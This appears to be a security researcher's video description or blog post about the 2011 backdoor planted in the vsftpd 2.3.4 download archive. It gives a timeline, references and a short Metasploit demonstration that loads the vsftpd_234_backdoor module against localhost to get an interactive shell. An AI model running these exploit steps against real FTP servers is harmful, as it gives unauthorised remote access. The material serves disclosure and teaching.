Subscribe: http://www.youtube.com/subscription_center?add_user=wowzataz
Blog : http://eromang.zataz.com
Twitter : http://twitter.com/eromang

Timeline :
Backdoor discovered by Mathias Kresin
Source code correction the 2011-07-03
Metasploit exploit released the 2011-07-04

Provided by:
hdm

References :
http://pastebin.com/AetT9sS5
http://scarybeastsecurity.blogspot.com/2011/07/alert-vsftpd-download-backdoored.html
http://download.polytechnic.edu.na/pub2/vsftpd/

Affected versions :
vsftpd-2.3.4 from 2011-06-30

Tested on Ubuntu Lucid 10.04.1 LTS with vsftpd-2.3.4
Thanks for the diffs 🙂

Description:
This module exploits a malicious backdoor that was added to the VSFTPD download archive. This backdoor was present in the vsftpd-2.3.4.tar.gz archive sometime before July 3rd 2011.

Metasploit demo :

use exploit/unix/ftp/vsftpd_234_backdoor
set RHOST localhost
set PAYLOAD cmd/unix/interact
exploit

id
uname -a

source